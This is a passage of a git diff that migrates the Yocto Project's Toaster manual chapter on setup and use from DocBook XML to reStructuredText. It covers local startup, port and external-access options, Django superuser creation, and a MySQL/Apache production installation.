- The command is a sanity check that returns page loading
- times in order to identify performance problems.
- </para>
- </section>
-
- <section id='toaster-command-checksettings'>
- <title><filename>checksettings</filename></title>
-
- <para>
- The <filename>checksettings</filename> command verifies
- existing Toaster settings.
- Access the command as follows:
- <literallayout class='monospaced'>
- $ bitbake/lib/toaster/manage.py checksettings
- </literallayout>
- Toaster uses settings that are based on the
- database to configure the building tasks.
- The <filename>checksettings</filename> command verifies that
- the database settings are valid in the sense that they have
- the minimal information needed to start a build.
- </para>
-
- <para>
- In order for the <filename>checksettings</filename> command
- to work, the database must be correctly set up and not have
- existing data.
- To be sure the database is ready, you can run the following:
- <literallayout class='monospaced'>
- $ bitbake/lib/toaster/mana​ge.py syncdb
- $ bitbake/lib/toaster/mana​ge.py migrate orm
- $ bitbake/lib/toaster/mana​ge.py migrate bldcontrol
- </literallayout>
- After running these commands, you can run the
- <filename>checksettings</filename> command.
- </para>
- </section>
-
- <section id='toaster-command-runbuilds'>
- <title><filename>runbuilds</filename></title>
-
- <para>
- The <filename>runbuilds</filename> command launches
- scheduled builds.
- Access the command as follows:
- <literallayout class='monospaced'>
- $ bitbake/lib/toaster/manage.py runbuilds
- </literallayout>
- The <filename>runbuilds</filename> command checks if
- scheduled builds exist in the database and then launches them
- per schedule.
- The command returns after the builds start but before they
- complete.
- The Toaster Logging Interface records and updates the database
- when the builds complete.
- </para>
- </section>
- </section>
-</chapter>
diff --git a/documentation/toaster-manual/toaster-manual-setup-and-use.rst b/documentation/toaster-manual/toaster-manual-setup-and-use.rst
new file mode 100644
index 0000000000..97c5af6a0c
--- /dev/null
+++ b/documentation/toaster-manual/toaster-manual-setup-and-use.rst
@@ -0,0 +1,651 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+.. Set default pygment highlighting to 'shell' for this document
+.. highlight:: shell
+
+****************************
+Setting Up and Using Toaster
+****************************
+
+Starting Toaster for Local Development
+======================================
+
+Once you have set up the Yocto Project and installed the Toaster system
+dependencies as described in the ":ref:`toaster-manual/toaster-manual-start:Preparing to Use
+Toaster`" chapter, you are ready to start
+Toaster.
+
+Navigate to the root of your
+:term:`Source Directory` (e.g. ``poky``)::
+
+ $ cd poky
+
+Once in that directory, source the build environment script::
+
+ $ source oe-init-build-env
+
+Next, from the build directory (e.g.
+``poky/build``), start Toaster using this command::
+
+ $ source toaster start
+
+You can now run your builds from the command line, or with Toaster
+as explained in section
+":ref:`toaster-manual/toaster-manual-setup-and-use:using the toaster web interface`".
+
+To access the Toaster web interface, open your favorite browser and
+enter the following::
+
+ http://127.0.0.1:8000
+
+Setting a Different Port
+========================
+
+By default, Toaster starts on port 8000. You can use the ``WEBPORT``
+parameter to set a different port. For example, the following command
+sets the port to "8400"::
+
+ $ source toaster start webport=8400
+
+Setting Up Toaster Without a Web Server
+=======================================
+
+You can start a Toaster environment without starting its web server.
+This is useful for the following:
+
+- Capturing a command-line build's statistics into the Toaster database
+ for examination later.
+
+- Capturing a command-line build's statistics when the Toaster server
+ is already running.
+
+- Having one instance of the Toaster web server track and capture
+ multiple command-line builds, where each build is started in its own
+ "noweb" Toaster environment.
+
+The following commands show how to start a Toaster environment without
+starting its web server, perform BitBake operations, and then shut down
+the Toaster environment. Once the build is complete, you can close the
+Toaster environment. Before closing the environment, however, you should
+allow a few minutes to ensure the complete transfer of its BitBake build
+statistics to the Toaster database. If you have a separate Toaster web
+server instance running, you can watch this command-line build's
+progress and examine the results as soon as they are posted::
+
+ $ source toaster start noweb
+ $ bitbake target
+ $ source toaster stop
+
+Setting Up Toaster Without a Build Server
+=========================================
+
+You can start a Toaster environment with the "New Projects" feature
+disabled. Doing so is useful for the following:
+
+- Sharing your build results over the web server while blocking others
+ from starting builds on your host.
+
+- Allowing only local command-line builds to be captured into the
+ Toaster database.
+
+Use the following command to set up Toaster without a build server::
+
+ $ source toaster start nobuild webport=port
+
+Setting up External Access
+==========================
+
+By default, Toaster binds to the loop back address (i.e. ``localhost``),
+which does not allow access from external hosts. To allow external
+access, use the ``WEBPORT`` parameter to open an address that connects
+to the network, specifically the IP address that your NIC uses to
+connect to the network. You can also bind to all IP addresses the
+computer supports by using the shortcut "0.0.0.0:port".
+
+The following example binds to all IP addresses on the host::
+
+ $ source toaster start webport=0.0.0.0:8400
+
+This example binds to a specific IP address on the host's NIC::
+
+ $ source toaster start webport=192.168.1.1:8400
+
+The Directory for Cloning Layers
+================================
+
+Toaster creates a ``_toaster_clones`` directory inside your Source
+Directory (i.e. ``poky``) to clone any layers needed for your builds.
+
+Alternatively, if you would like all of your Toaster related files and
+directories to be in a particular location other than the default, you
+can set the ``TOASTER_DIR`` environment variable, which takes precedence
+over your current working directory. Setting this environment variable
+causes Toaster to create and use ``$TOASTER_DIR./_toaster_clones``.
+
+.. _toaster-the-build-directory:
+
+The Build Directory
+===================
+
+Toaster creates a build directory within your Source Directory (e.g.
+``poky``) to execute the builds.
+
+Alternatively, if you would like all of your Toaster related files and
+directories to be in a particular location, you can set the
+``TOASTER_DIR`` environment variable, which takes precedence over your
+current working directory. Setting this environment variable causes
+Toaster to use ``$TOASTER_DIR/build`` as the build directory.
+
+.. _toaster-creating-a-django-super-user:
+
+Creating a Django Superuser
+===========================
+
+Toaster is built on the `Django
+framework <https://www.djangoproject.com/>`__. Django provides an
+administration interface you can use to edit Toaster configuration
+parameters.
+
+To access the Django administration interface, you must create a
+superuser by following these steps:
+
+#. If you used ``pip3``, which is recommended, to set up the Toaster
+ system dependencies, you need be sure the local user path is in your
+ ``PATH`` list. To append the pip3 local user path, use the following
+ command::
+
+ $ export PATH=$PATH:$HOME/.local/bin
+
+#. From the directory containing the Toaster database, which by default
+ is the :term:`Build Directory`,
+ invoke the ``createsuperuser`` command from ``manage.py``::
+
+ $ cd ~/poky/build
+ $ ../bitbake/lib/toaster/manage.py createsuperuser
+
+#. Django prompts you for the username, which you need to provide.
+
+#. Django prompts you for an email address, which is optional.
+
+#. Django prompts you for a password, which you must provide.
+
+#. Django prompts you to re-enter your password for verification.
+
+After completing these steps, the following confirmation message
+appears::
+
+ Superuser created successfully.
+
+Creating a superuser allows you to access the Django administration
+interface through a browser. The URL for this interface is the same as
+the URL used for the Toaster instance with "/admin" on the end. For
+example, if you are running Toaster locally, use the following URL::
+
+ http://127.0.0.1:8000/admin
+
+You can use the Django administration interface to set Toaster configuration
+parameters such as the build directory, layer sources, default variable
+values, and BitBake versions.
+
+.. _toaster-setting-up-a-production-instance-of-toaster:
+
+Setting Up a Production Instance of Toaster
+===========================================
+
+You can use a production instance of Toaster to share the Toaster
+instance with remote users, multiple users, or both. The production
+instance is also the setup that can handle heavier loads on the web
+service. Use the instructions in the following sections to set up
+Toaster to run builds through the Toaster web interface.
+
+.. _toaster-production-instance-requirements:
+
+Requirements
+------------
+
+Be sure you meet the following requirements:
+
+.. note::
+
+ You must comply with all Apache, ``mod-wsgi``, and Mysql requirements.
+
+- Have all the build requirements as described in the ":ref:`toaster-manual/toaster-manual-start:Preparing to
+ Use Toaster`" chapter.
+
+- Have an Apache webserver.
+
+- Have ``mod-wsgi`` for the Apache webserver.
+
+- Use the Mysql database server.
+
+- If you are using Ubuntu, run the following::
+
+ $ sudo apt-get install apache2 libapache2-mod-wsgi-py3 mysql-server python3-pip libmysqlclient-dev
+
+- If you are using Fedora or a RedHat distribution, run the
+ following::
+
+ $ sudo dnf install httpd python3-mod_wsgi python3-pip mariadb-server mariadb-devel python3-devel
+
+- If you are using openSUSE, run the following::
+
+ $ sudo zypper install apache2 apache2-mod_wsgi-python3 python3-pip mariadb mariadb-client python3-devel
+
+.. _toaster-installation-steps:
+
+Installation
+------------
+
+Perform the following steps to install Toaster:
+
+#. Create toaster user and set its home directory to
+ ``/var/www/toaster``::
+
+ $ sudo /usr/sbin/useradd toaster -md /var/www/toaster -s /bin/false
+ $ sudo su - toaster -s /bin/bash
+
+#. Checkout a copy of ``poky`` into the web server directory. You will
+ be using ``/var/www/toaster``::
+
+ $ git clone git://git.yoctoproject.org/poky
+ $ git checkout &DISTRO_NAME_NO_CAP;
+
+#. Install Toaster dependencies using the --user flag which keeps the
+ Python packages isolated from your system-provided packages::
+
+ $ cd /var/www/toaster/
+ $ pip3 install --user -r ./poky/bitbake/toaster-requirements.txt
+ $ pip3 install --user mysqlclient
+
+ .. note::
+
+ Isolating these packages is not required but is recommended.
+ Alternatively, you can use your operating system's package
+ manager to install the packages.
+
+#. Configure Toaster by editing
+ ``/var/www/toaster/poky/bitbake/lib/toaster/toastermain/settings.py``
+ as follows:
+
+ - Edit the
+ `DATABASES <https://docs.djangoproject.com/en/2.2/ref/settings/#databases>`__
+ settings:
+
+ .. code-block:: python
+
+ DATABASES = {
+ 'default': {
+ 'ENGINE': 'django.db.backends.mysql',
+ 'NAME': 'toaster_data',
+ 'USER': 'toaster',
+ 'PASSWORD': 'yourpasswordhere',
+ 'HOST': 'localhost',
+ 'PORT': '3306',
+ }
+ }
+
+ - Edit the
+ `SECRET_KEY <https://docs.djangoproject.com/en/2.2/ref/settings/#std:setting-SECRET_KEY>`__:
+
+ .. code-block:: python
+
+ SECRET_KEY = 'your_secret_key'
+
+ - Edit the
+ `STATIC_ROOT <https://docs.djangoproject.com/en/2.2/ref/settings/#std:setting-STATIC_ROOT>`__:
+
+ .. code-block:: python
+
+ STATIC_ROOT = '/var/www/toaster/static_files/'
+
+#. Add the database and user to the ``mysql`` server defined earlier::
+
+ $ mysql -u root -p
+ mysql> CREATE DATABASE toaster_data;
+ mysql> CREATE USER 'toaster'@'localhost' identified by 'yourpasswordhere';
+ mysql> GRANT all on toaster_data.\* to 'toaster'@'localhost';
+ mysql> quit
+
+#. Get Toaster to create the database schema, default data, and gather
+ the statically-served files::
+
+ $ cd /var/www/toaster/poky/
+ $ ./bitbake/lib/toaster/manage.py migrate
+ $ TOASTER_DIR=`pwd\` TEMPLATECONF='poky' \
+ ./bitbake/lib/toaster/manage.py checksettings
+ $ ./bitbake/lib/toaster/manage.py collectstatic
+
+
+ In the previous
+ example, from the ``poky`` directory, the ``migrate`` command
+ ensures the database schema changes have propagated correctly (i.e.
+ migrations). The next line sets the Toaster root directory
+ ``TOASTER_DIR`` and the location of the Toaster configuration file
+ ``TOASTER_CONF``, which is relative to ``TOASTER_DIR``. The
+ ``TEMPLATECONF`` value reflects the contents of
+ ``poky/.templateconf``, and by default, should include the string
+ "poky". For more information on the Toaster configuration file, see
+ the ":ref:`toaster-manual/toaster-manual-reference:Configuring Toaster`" section.
+
+ This line also runs the ``checksettings`` command, which configures
+ the location of the Toaster :term:`Build Directory`.
+ The Toaster
+ root directory ``TOASTER_DIR`` determines where the Toaster build
+ directory is created on the file system. In the example above,
+ ``TOASTER_DIR`` is set as follows::
+
+ /var/www/toaster/poky
+
+
+ This setting causes the Toaster build directory to be::
+
+ /var/www/toaster/poky/build
+
+ Finally, the ``collectstatic`` command is a Django framework command
+ that collects all the statically served files into a designated
+ directory to be served up by the Apache web server as defined by
+ ``STATIC_ROOT``.
+
+#. Test and/or use the Mysql integration with Toaster's Django web
+ server. At this point, you can start up the normal Toaster Django
+ web server with the Toaster database in Mysql. You can use this web
+ server to confirm that the database migration and data population
+ from the Layer Index is complete.
+
+ To start the default Toaster Django web server with the Toaster
+ database now in Mysql, use the standard start commands::
+
+ $ source oe-init-build-env
+ $ source toaster start
+
+ Additionally, if Django is sufficient for your requirements, you can use
+ it for your release system and migrate later to Apache as your
+ requirements change.
+
+#. Add an Apache configuration file for Toaster to your Apache web
+ server's configuration directory. If you are using Ubuntu or Debian,
+ put the file here::
+
+ /etc/apache2/conf-available/toaster.conf
+
+
+ If you are using Fedora or RedHat, put it here::
+
+ /etc/httpd/conf.d/toaster.conf
+
+ If you are using OpenSUSE, put it here::
+
+ /etc/apache2/conf.d/toaster.conf
+
+ Following is a sample Apache configuration for Toaster you can follow:
+
+ .. code-block:: apache
+
+ Alias /static /var/www/toaster/static_files
+ <Directory /var/www/toaster/static_files>
+ <IfModule mod_access_compat.c>
+ Order allow,deny
+ Allow from all
+ </IfModule>
+ <IfModule !mod_access_compat.c>
+ Require all granted
+ </IfModule>
+ </Directory>
+
+ <Directory /var/www/toaster/poky/bitbake/lib/toaster/toastermain>
+ <Files "wsgi.py">
+ Require all granted
+ </Files>
+ </Directory>
+
+ WSGIDaemonProcess toaster_wsgi python-path=/var/www/toaster/poky/bitbake/lib/toaster:/var/www/toaster/.local/lib/python3.4/site-packages
+ WSGIScriptAlias / "/var/www/toaster/poky/bitbake/lib/toaster/toastermain/wsgi.py"
+ <Location />
+ WSGIProcessGroup toaster_wsgi
+ </Location>
+
+
+ If you are using Ubuntu or Debian, you will need to enable the config and
+ module for Apache::
+
+ $ sudo a2enmod wsgi
+ $ sudo a2enconf toaster
+ $ chmod +x bitbake/lib/toaster/toastermain/wsgi.py
+
+ Finally, restart Apache to make sure all new configuration is loaded. For Ubuntu,
+ Debian, and OpenSUSE use::
+
+ $ sudo service apache2 restart
+
+ For Fedora and RedHat use::
+
+ $ sudo service httpd restart
+
+#. Prepare the systemd service to run Toaster builds. Here is a sample
+ configuration file for the service:
+
+ .. code-block:: ini
+
+ [Unit]
+ Description=Toaster runbuilds
+
+ [Service]
+ Type=forking User=toaster
+ ExecStart=/usr/bin/screen -d -m -S runbuilds /var/www/toaster/poky/bitbake/lib/toaster/runbuilds-service.sh start
+ ExecStop=/usr/bin/screen -S runbuilds -X quit
+ WorkingDirectory=/var/www/toaster/poky
+
+ [Install]
+ WantedBy=multi-user.target
+
+
+ Prepare the ``runbuilds-service.sh`` script that you need to place in the
+ ``/var/www/toaster/poky/bitbake/lib/toaster/`` directory by setting
+ up executable permissions::
+
+ #!/bin/bash
+
+ #export http_proxy=http://proxy.host.com:8080
+ #export https_proxy=http://proxy.host.com:8080
+ #export GIT_PROXY_COMMAND=$HOME/bin/gitproxy
+ cd ~/poky/
+ source ./oe-init-build-env build
+ source ../bitbake/bin/toaster $1 noweb
+ [ "$1" == 'start' ] && /bin/bash
+
+#. Run the service::
+
+ $ sudo service runbuilds start
+
+ Since the service is running in a detached screen session, you can
+ attach to it using this command::
+
+ $ sudo su - toaster
+ $ screen -rS runbuilds
+
+ You can detach from the service again using "Ctrl-a" followed by "d" key
+ combination.
+
+You can now open up a browser and start using Toaster.
+
+Using the Toaster Web Interface
+===============================
+
+The Toaster web interface allows you to do the following:
+
+- Browse published layers in the `OpenEmbedded Layer
+ Index <http://layers.openembedded.org>`__ that are available for your
+ selected version of the build system.
+
+- Import your own layers for building.
+
+- Add and remove layers from your configuration.
+
+- Set configuration variables.
+
+- Select a target or multiple targets to build.
+
+- Start your builds.
+
+- See what was built (recipes and packages) and what packages were
+ installed into your final image.
+
+- Browse the directory structure of your image.
+
+- See the value of all variables in your build configuration, and which
+ files set each value.
+
+- Examine error, warning and trace messages to aid in debugging.
+
+- See information about the BitBake tasks executed and reused during
+ your build, including those that used shared state.
+
+- See dependency relationships between recipes, packages and tasks.
+
+- See performance information such as build time, task time, CPU usage,
+ and disk I/O.
+
+.. _web-interface-videos:
+
+Toaster Web Interface Videos
+----------------------------
+
+Following are several videos that show how to use the Toaster GUI:
+
+- *Build Configuration:* This
+ `video <https://www.youtube.com/watch?v=qYgDZ8YzV6w>`__ overviews and
+ demonstrates build configuration for Toaster.
+
+- *Build Custom Layers:* This
+ `video <https://www.youtube.com/watch?v=QJzaE_XjX5c>`__ shows you how
+ to build custom layers that are used with Toaster.
+
+- *Toaster Homepage and Table Controls:* This
+ `video <https://www.youtube.com/watch?v=QEARDnrR1Xw>`__ goes over the
+ Toaster entry page, and provides an overview of the data manipulation
+ capabilities of Toaster, which include search, sorting and filtering
+ by different criteria.
+
+- *Build Dashboard:* This
+ `video <https://www.youtube.com/watch?v=KKqHYcnp2gE>`__ shows you the
+ build dashboard, a page providing an overview of the information
+ available for a selected build.
+
+- *Image Information:* This
+ `video <https://www.youtube.com/watch?v=XqYGFsmA0Rw>`__ walks through
+ the information Toaster provides about images: packages installed and
+ root file system.
+
+- *Configuration:* This
+ `video <https://www.youtube.com/watch?v=UW-j-T2TzIg>`__ provides
+ Toaster build configuration information.
+
+- *Tasks:* This `video <https://www.youtube.com/watch?v=D4-9vGSxQtw>`__
+ shows the information Toaster provides about the tasks run by the
+ build system.
+
+- *Recipes and Packages Built:* This
+ `video <https://www.youtube.com/watch?v=x-6dx4huNnw>`__ shows the
+ information Toaster provides about recipes and packages built.
+
+- *Performance Data:* This
+ `video <https://www.youtube.com/watch?v=qWGMrJoqusQ>`__ shows the
+ build performance data provided by Toaster.
+
+.. _a-note-on-the-local-yocto-project-release:
+
+Additional Information About the Local Yocto Project Release
+------------------------------------------------------------
+
+This section only applies if you have set up Toaster for local
+development, as explained in the
+":ref:`toaster-manual/toaster-manual-setup-and-use:starting toaster for local development`"
+section.
+
+When you create a project in Toaster, you will be asked to provide a
+name and to select a Yocto Project release. One of the release options
+you will find is called "Local Yocto Project".
+
+.. image:: figures/new-project.png
+ :align: center
+ :scale: 75%
+
+When you select the "Local Yocto Project" release, Toaster will run your
+builds using the local Yocto Project clone you have in your computer:
+the same clone you are using to run Toaster. Unless you manually update
+this clone, your builds will always use the same Git revision.
+
+If you select any of the other release options, Toaster will fetch the
+tip of your selected release from the upstream `Yocto Project
+repository <https://git.yoctoproject.org>`__ every time you run a build.
+Fetching this tip effectively means that if your selected release is
+updated upstream, the Git revision you are using for your builds will
+change. If you are doing development locally, you might not want this
+change to happen. In that case, the "Local Yocto Project" release might
+be the right choice.
+
+However, the "Local Yocto Project" release will not provide you with any
+compatible layers, other than the three core layers that come with the
+Yocto Project:
+
+- `openembedded-core <http://layers.openembedded.org/layerindex/branch/master/layer/openembedded-core/>`__
+
+- `meta-poky <http://layers.openembedded.org/layerindex/branch/master/layer/meta-poky/>`__
+
+- `meta-yocto-bsp <http://layers.openembedded.org/layerindex/branch/master/layer/meta-yocto-bsp/>`__
+
+.. image:: figures/compatible-layers.png
+ :align: center
+ :scale: 75%
+
+If you want to build any other layers, you will need to manually import
+them into your Toaster project, using the "Import layer" page.
+
+.. image:: figures/import-layer.png
+ :align: center
+ :scale: 75%
+
+.. _toaster-web-interface-preferred-version:
+
+Building a Specific Recipe Given Multiple Versions
+--------------------------------------------------
+
+Occasionally, a layer might provide more than one version of the same
+recipe. For example, the ``openembedded-core`` layer provides two
+versions of the ``bash`` recipe (i.e. 3.2.48 and 4.3.30-r0) and two
+versions of the ``which`` recipe (i.e. 2.21 and 2.18). The following
+figure shows this exact scenario:
+
+.. image:: figures/bash-oecore.png
+ :align: center
+ :scale: 75%
+
+By default, the OpenEmbedded build system builds one of the two recipes.
+For the ``bash`` case, version 4.3.30-r0 is built by default.
+Unfortunately, Toaster as it exists, is not able to override the default
+recipe version. If you would like to build bash 3.2.48, you need to set
+the
+:term:`PREFERRED_VERSION`
+variable. You can do so from Toaster, using the "Add variable" form,
+which is available in the "BitBake variables" page of the project
+configuration section as shown in the following screen:
+
+.. image:: figures/add-variable.png
+ :align: center
+ :scale: 75%
+
+To specify ``bash`` 3.2.48 as the version to build, enter
+"PREFERRED_VERSION_bash" in the "Variable" field, and "3.2.48" in the
+"Value" field. Next, click the "Add variable" button:
+
+.. image:: figures/set-variable.png
+ :align: center
+ :scale: 75%
+
+After clicking the "Add variable" button, the settings for
+``PREFERRED_VERSION`` are added to the bottom of the BitBake variables
+list. With these settings, the OpenEmbedded build system builds the
+desired version of the recipe rather than the default version:
+
+.. image:: figures/variable-added.png
+ :align: center
+ :scale: 75%
diff --git a/documentation/toaster-manual/toaster-manual-setup-and-use.xml b/documentation/toaster-manual/toaster-manual-setup-and-use.xml
deleted file mode 100644
index b4caebbe0f..0000000000
--- a/documentation/toaster-manual/toaster-manual-setup-and-use.xml
+++ /dev/null
@@ -1,843 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='toaster-manual-setup-and-use'>
-
-<title>Setting Up and Using Toaster</title>
-
- <section id='starting-toaster-for-local-development'>
- <title>Starting Toaster for Local Development</title>
-
- <para>
- Once you have set up the Yocto Project and installed the
- Toaster system dependencies as described in the
- "<link linkend='toaster-manual-start'>Preparing to Use Toaster</link>"
- chapter, you are ready to start Toaster.
- </para>
-
- <para>
- Navigate to the root of your
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- (e.g. <filename>poky</filename>):
- <literallayout class='monospaced'>
- $ cd poky
- </literallayout>
- Once in that directory, source the build environment script:
- <literallayout class='monospaced'>
- $ source oe-init-build-env
- </literallayout>
- Next, from the build directory (e.g.
- <filename>poky/build</filename>), start Toaster using this
- command:
- <literallayout class='monospaced'>
- $ source toaster start
- </literallayout>
- You can now run your builds from the command line, or with
- Toaster as explained in section
- "<link linkend='using-the-toaster-web-interface'>Using the Toaster Web Interface</link>".
- </para>
-
- <para>
- To access the Toaster web interface, open your favorite
- browser and enter the following:
- <literallayout class='monospaced'>
- http://127.0.0.1:8000
- </literallayout>
- </para>
- </section>
-
- <section id='setting-a-different-port'>
- <title>Setting a Different Port</title>
-
- <para>
- By default, Toaster starts on port 8000.
- You can use the <filename>WEBPORT</filename> parameter to
- set a different port.
- For example, the following command sets the port to "8400":
- <literallayout class='monospaced'>
- $ source toaster start webport=8400
- </literallayout>
- </para>
- </section>
-
- <section id='setting-up-toaster-without-a-web-server'>
- <title>Setting Up Toaster Without a Web Server</title>
-
- <para>
- You can start a Toaster environment without starting its
- web server. This is useful for the following:
- <itemizedlist>
- <listitem><para>
- Capturing a command-line build’s statistics into
- the Toaster database for examination later.
- </para></listitem>
- <listitem><para>
- Capturing a command-line build’s statistics when
- the Toaster server is already running.
- </para></listitem>
- <listitem><para>
- Having one instance of the Toaster web server
- track and capture multiple command-line builds,
- where each build is started in its own “nowebâ€
- Toaster environment.
- </para></listitem>
- </itemizedlist>
- The following commands show how to start a Toaster environment
- without starting its web server, perform BitBake operations,
- and then shut down the Toaster environment.
- Once the build is complete, you can close the Toaster environment.
- Before closing the environment, however, you should allow a few
- minutes to ensure the complete transfer of its BitBake build
- statistics to the Toaster database.
- If you have a separate Toaster web server instance running, you
- can watch this command-line build’s progress and examine the
- results as soon as they are posted:
- <literallayout class='monospaced'>
- $ source toaster start noweb
- $ bitbake <replaceable>target</replaceable>
- $ source toaster stop
- </literallayout>
- </para>
- </section>
-
- <section id='setting-up-toaster-without-a-build-server'>
- <title>Setting Up Toaster Without a Build Server</title>
-
- <para>
- You can start a Toaster environment with the
- “New Projects†feature disabled.
- Doing so is useful for the following:
- <itemizedlist>
- <listitem><para>
- Sharing your build results over the web server while
- blocking others from starting builds on your host.
- </para></listitem>
- <listitem><para>
- Allowing only local command-line builds to be captured
- into the Toaster database.
- </para></listitem>
- </itemizedlist>
- Use the following command to set up Toaster without a
- build server:
- <literallayout class='monospaced'>
- $ source toaster start nobuild webport=<replaceable>port</replaceable>
- </literallayout>
- </para>
- </section>
-
- <section id='setting-up-external-access'>
- <title>Setting up External Access</title>
-
- <para>
- By default, Toaster binds to the loop back address
- (i.e. localhost), which does not allow access from
- external hosts. To allow external access, use the
- <filename>WEBPORT</filename> parameter to open an
- address that connects to the network, specifically the
- IP address that your NIC uses to connect to the network.
- You can also bind to all IP addresses the computer
- supports by using the shortcut
- "0.0.0.0:<replaceable>port</replaceable>".
- </para>
-
- <para>
- The following example binds to all IP addresses on the
- host:
- <literallayout class='monospaced'>
- $ source toaster start webport=0.0.0.0:8400
- </literallayout>
- This example binds to a specific IP address on the host's
- NIC:
- <literallayout class='monospaced'>
- $ source toaster start webport=192.168.1.1:8400
- </literallayout>
- </para>
- </section>
-
- <section id='the-directory-for-cloning-layers'>
- <title>The Directory for Cloning Layers</title>
-
- <para>
- Toaster creates a <filename>_toaster_clones</filename>
- directory inside your Source Directory
- (i.e. <filename>poky</filename>) to clone any layers
- needed for your builds.
- </para>
-
- <para>
- Alternatively, if you would like all of your Toaster related
- files and directories to be in a particular location other than
- the default, you can set the <filename>TOASTER_DIR</filename>
- environment variable, which takes precedence over your current
- working directory.
- Setting this environment variable causes Toaster to create and use
- <filename>$TOASTER_DIR./_toaster_clones</filename>.
- </para>
- </section>
-
- <section id='toaster-the-build-directory'>
- <title>The Build Directory</title>
-
- <para>
- Toaster creates a build directory within your Source
- Directory (e.g. <filename>poky</filename>) to execute
- the builds.
- </para>
-
- <para>
- Alternatively, if you would like all of your Toaster related files
- and directories to be in a particular location, you can set
- the <filename>TOASTER_DIR</filename> environment variable,
- which takes precedence over your current working directory.
- Setting this environment variable causes Toaster to use
- <filename>$TOASTER_DIR/build</filename> as the build directory.
- </para>
- </section>
-
- <section id='toaster-creating-a-django-super-user'>
- <title>Creating a Django Superuser</title>
-
- <para>
- Toaster is built on the
- <ulink url='https://www.djangoproject.com/'>Django framework</ulink>.
- Django provides an administration interface you can use
- to edit Toaster configuration parameters.
- </para>
-
- <para>
- To access the Django administration interface, you must
- create a superuser by following these steps:
- <orderedlist>
- <listitem><para>
- If you used <filename>pip3</filename>, which is
- recommended, to set up the Toaster system dependencies,
- you need be sure the local user path is in your
- <filename>PATH</filename> list.
- To append the pip3 local user path, use the following
- command:
- <literallayout class='monospaced'>
- $ export PATH=$PATH:$HOME/.local/bin
- </literallayout>
- </para></listitem>
- <listitem><para>
- From the directory containing the Toaster database,
- which by default is the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>,
- invoke the <filename>createsuperuser</filename> command
- from <filename>manage.py</filename>:
- <literallayout class='monospaced'>
- $ cd ~/poky/build
- $ ../bitbake/lib/toaster/manage.py createsuperuser
- </literallayout>
- </para></listitem>
- <listitem><para>
- Django prompts you for the username, which you need to
- provide.
- </para></listitem>
- <listitem><para>
- Django prompts you for an email address, which is
- optional.
- </para></listitem>
- <listitem><para>
- Django prompts you for a password, which you must provide.
- </para></listitem>
- <listitem><para>
- Django prompts you to re-enter your password for verification.
- </para></listitem>
- </orderedlist>
- After completing these steps, the following confirmation message
- appears:
- <literallayout class='monospaced'>
- Superuser created successfully.
- </literallayout>
- </para>
-
- <para>
- Creating a superuser allows you to access the Django administration
- interface through a browser.
- The URL for this interface is the same as the URL used for the
- Toaster instance with "/admin" on the end.
- For example, if you are running Toaster locally, use the
- following URL:
- <literallayout class='monospaced'>
- http://127.0.0.1:8000/admin
- </literallayout>
- You can use the Django administration interface to set Toaster
- configuration parameters such as the build directory, layer sources,
- default variable values, and BitBake versions.
- </para>
- </section>
-
- <section id='toaster-setting-up-a-production-instance-of-toaster'>
- <title>Setting Up a Production Instance of Toaster</title>
-
- <para>
- You can use a production instance of Toaster to share the
- Toaster instance with remote users, multiple users, or both.
- The production instance is also the setup that can handle
- heavier loads on the web service.
- Use the instructions in the following sections to set up
- Toaster to run builds through the Toaster web interface.
- </para>
-
- <section id='toaster-production-instance-requirements'>
- <title>Requirements</title>
-
- <para>
- Be sure you meet the following requirements:
- <note>
- You must comply with all Apache,
- <filename>mod-wsgi</filename>, and Mysql requirements.
- </note>
- <itemizedlist>
- <listitem><para>
- Have all the build requirements as described in the
- "<link linkend='toaster-manual-start'>Preparing to Use Toaster</link>"
- chapter.
- </para></listitem>
- <listitem><para>
- Have an Apache webserver.
- </para></listitem>
- <listitem><para>
- Have <filename>mod-wsgi</filename> for the Apache
- webserver.
- </para></listitem>
- <listitem><para>
- Use the Mysql database server.
- </para></listitem>
- <listitem><para>
- If you are using Ubuntu 16.04, run the following:
- <literallayout class='monospaced'>
- $ sudo apt-get install apache2 libapache2-mod-wsgi-py3 mysql-server python3-pip libmysqlclient-dev
- </literallayout>
- </para></listitem>
- <listitem><para>
- If you are using Fedora 24 or a RedHat distribution, run
- the following:
- <literallayout class='monospaced'>
- $ sudo dnf install httpd python3-mod_wsgi python3-pip mariadb-server mariadb-devel python3-devel
- </literallayout>
- </para></listitem>
- <listitem><para>
- If you are using openSUSE Leap 42.1, run
- the following:
- <literallayout class='monospaced'>
- $ sudo zypper install apache2 apache2-mod_wsgi-python3 python3-pip mariadb mariadb-client python3-devel
- </literallayout>
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='toaster-installation-steps'>
- <title>Installation</title>
-
- <para>
- Perform the following steps to install Toaster:
- <orderedlist>
- <listitem><para>
- Create toaster user and set its home directory to
- <filename>/var/www/toaster</filename>:
- <literallayout class='monospaced'>
- $ sudo /usr/sbin/useradd toaster -md /var/www/toaster -s /bin/false
- $ sudo su - toaster -s /bin/bash
- </literallayout>
- </para></listitem>
- <listitem><para>
- Checkout a copy of <filename>poky</filename>
- into the web server directory.
- You will be using <filename>/var/www/toaster</filename>:
- <literallayout class='monospaced'>
- $ git clone git://git.yoctoproject.org/poky
- $ git checkout &DISTRO_NAME_NO_CAP;
- </literallayout>
- </para></listitem>
- <listitem><para>
- Install Toaster
- dependencies using the --user flag which
- keeps the Python packages
- isolated from your system-provided packages:
- <literallayout class='monospaced'>
- $ cd /var/www/toaster/
- $ pip3 install --user -r ./poky/bitbake/toaster-requirements.txt
- $ pip3 install --user mysqlclient
- </literallayout>
- <note>
- Isolating these packages is not required but is
- recommended.
- Alternatively, you can use your operating system's
- package manager to install the packages.
- </note>
- </para></listitem>
- <listitem><para>
- Configure Toaster by editing
- <filename>/var/www/toaster/poky/bitbake/lib/toaster/toastermain/settings.py</filename>
- as follows:
- <itemizedlist>
- <listitem><para>
- Edit the
- <ulink url='https://docs.djangoproject.com/en/1.11/ref/settings/#databases'>DATABASES</ulink>
- settings:
- <literallayout class='monospaced'>
- DATABASES = {
- 'default': {
